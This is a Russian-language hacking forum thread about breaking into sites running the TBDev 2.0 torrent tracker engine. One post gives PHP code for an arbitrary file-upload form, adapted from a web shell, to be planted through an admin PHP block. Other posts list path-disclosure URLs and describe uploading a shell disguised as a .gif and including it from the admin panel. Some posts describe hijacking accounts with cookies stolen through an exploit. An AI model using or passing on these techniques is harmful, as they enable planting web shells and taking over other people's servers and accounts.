Трекер-движок TBDev 2.0

Discussion in 'Веб-уязвимости' started by Qwazar, 5 Aug 2008.

  1. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    Нет, при добавлении блока он ещё своё добавляет :(
     
  2. Uname-A

    Uname-A Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    73
    Likes Received:
    12
    Reputations:
    5
    Code:
    $self = $_SERVER['PHP_SELF'];
    $docr = $_SERVER['DOCUMENT_ROOT'];
    $sern = $_SERVER['SERVER_NAME'];
    $tend = "</tr></form></table><br><br><br><br>";
    if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
    elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
    else {$ac = "upload";}
    switch($ac) {
    case "upload":
    echo <<<HTML
    <table>
    <form enctype="multipart/form-data" action="$self" method="POST">
    <input type="hidden" name="ac" value="upload">
    <tr>
    <input size="5" name="file" type="file"></td>
    </tr>
    <tr>
    <td><input size="10" value="$docr/" name="path" type="text"><input type="submit" value="ОК"></td>
    $tend
    HTML;
    if (isset($_POST['path'])){
    $uploadfile = $_POST['path'].$_FILES['file']['name'];
    if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
    
    if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
        echo "Файло  ".$_FILES['file']['name']."  загружен";
    } else {
        print "Не удаётся загрузить файло. Инфа:\n";
        print_r($_FILES);
    }
    }
    break;
    }
    ?>
    </pre>
    Вот Замутил это из одного древнего шела Создаёте пихапе блок вписываете туда весь этот код Сохраняете. в нужном блоке И на указанных вами страницах будет отабражаться формачка залифки файла Найдёте эту формачку Укажите директорию, зальете.
     
    3 people like this.
  3. ZonD80

    ZonD80 New Member

    Joined:
    29 Oct 2008
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Раскрытие путей:
    Code:
    recover.php?id[]=
    email-gateway.php?id[]=
    takeconfirm.php?id[]=
    takeinvite.php?id[]=
    topten.php?lim[]=
    topten.php?type[]=
    
     
    1 person likes this.
  4. 1ce666

    1ce666 Member

    Joined:
    9 Dec 2008
    Messages:
    45
    Likes Received:
    79
    Reputations:
    -4
  5. aledain

    aledain New Member

    Joined:
    11 Jan 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Подскажите, пожалуйста, способ залить шелл, зайдя в админку. Способ через php-блок не катит, т.к. на папке выставлены права не позволяющие в неё писать (((
    Если можно подробно.
     
  6. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    aledain, должны стоять права 777.

    Если они не стоят как ты сказал - тебе не повезло просто...
     
  7. Red Virus

    Red Virus New Member

    Joined:
    11 Aug 2008
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    Не обязательно 777 иногда скрипт принудительно записывает блок хоть и ругается на отсутствие прав нл это как уже упоминалось выше- как повезет
     
  8. pacan4ik

    pacan4ik New Member

    Joined:
    2 Nov 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    ?

    у меня половина кода высвечиваеться в блоке, и там 2 формы в первой выбрать файл, после выбора наживаю ентер и кидает на http://site.ru/$self
    пробвал во втором окне выбрать адрес в папку с оформление все так же кидает http://site.ru/$self
    что не так я делаю?
     
  9. Red Virus

    Red Virus New Member

    Joined:
    11 Aug 2008
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    Лучше залей гифный шелл и с инклудь его с админки

    Смени расширение шелла с php на gif залей на серв

    в админке создай php блок и сунь туда этот код

    например так

    include("torrents/images/44776.gif");

    потом выставляешь отображение блока на какой нить странице и вуаля на той страничке откроется шелл
     
    #69 Red Virus, 13 Jan 2009
    Last edited: 13 Jan 2009
    1 person likes this.
  10. Uname-A

    Uname-A Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    73
    Likes Received:
    12
    Reputations:
    5
    Это для старой версии сделано...
    На новой я не тестил..
    У нас в локале повальное распространение старого двига Серверов 100 наверно
    и все на одном двиге=)
     
  11. pacan4ik

    pacan4ik New Member

    Joined:
    2 Nov 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Ну так кто поможет? может кто зделать блок через который залить шел
     
  12. pacan4ik

    pacan4ik New Member

    Joined:
    2 Nov 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Икстати ред вирус можно зделать как нибудь не фаловый блок ,а простым блоком с инклудить?
     
  13. nAPEHb

    nAPEHb New Member

    Joined:
    13 Jan 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Подскажите как через куки зайти?

    Взял я его куки со своей базы.


    Открываю его сайт(куки)
    Ид меняю на его и куки его ставлю! Обновляю страницу и я становлюсь как гость, вылетаю из под акка! Почему??

    Обьяснить что не так
     
  14. _Sniper_

    _Sniper_ Banned

    Joined:
    21 Jul 2007
    Messages:
    409
    Likes Received:
    147
    Reputations:
    -17
    В поле uid в куках пишеш ид юзера...в поле pass пишеш куки которые ты через експлоит узнал...
    [​IMG]
     
  15. nAPEHb

    nAPEHb New Member

    Joined:
    13 Jan 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    я так и делаю! Но после того как обновляю страницу я делаюсь как гость :mad:
     
  16. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    nAPEHb, не туда пассхэш пишеш.И вообще, для этих дел юзай оперу
     
  17. nAPEHb

    nAPEHb New Member

    Joined:
    13 Jan 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Юзаю оперу!

    В куках 3 строки:
    pass
    PHPSESSID
    uid

    Я меняю 1 и 3! И вылетаю
     
  18. pacan4ik

    pacan4ik New Member

    Joined:
    2 Nov 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    возможно подмену куки заделал разработчик, и новые фикс версии уже не подмениш куки((
     
  19. ya_krivetko

    ya_krivetko New Member

    Joined:
    25 Oct 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    что то мне кажется не так по експлой запускаешь и получаешь ответ.
    Trying to get your cookies... [DONE]
    Trying to get passhash:
    Exploit failed
     
  20. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    Сбрей усы, надень трусы.

    Эксплоит уже мало где работает. Только там где ещё про багу не знают...